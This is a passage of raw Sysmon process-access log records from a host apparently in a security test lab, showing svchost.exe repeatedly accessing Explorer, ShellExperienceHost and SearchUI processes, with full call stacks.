10341000x80000000000000001046918Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:08.386{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046917Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:08.386{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046916Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:08.386{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046915Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:08.386{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046914Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:08.386{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046913Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:08.386{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046912Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:08.385{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046911Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:08.385{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046910Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:08.385{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046909Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:08.385{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046908Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:08.385{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046907Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:08.385{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046906Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:08.385{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046905Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:08.385{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046904Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:08.385{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046903Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:08.385{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046902Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:08.385{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046901Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:08.385{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046900Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:08.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046899Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:08.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046898Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:08.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046897Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:08.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046896Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:08.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046895Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:08.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046894Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:08.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046893Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:08.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046892Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:08.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046891Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:08.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046890Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:08.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046889Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:08.383{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046888Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:08.383{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046887Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:08.383{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046886Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 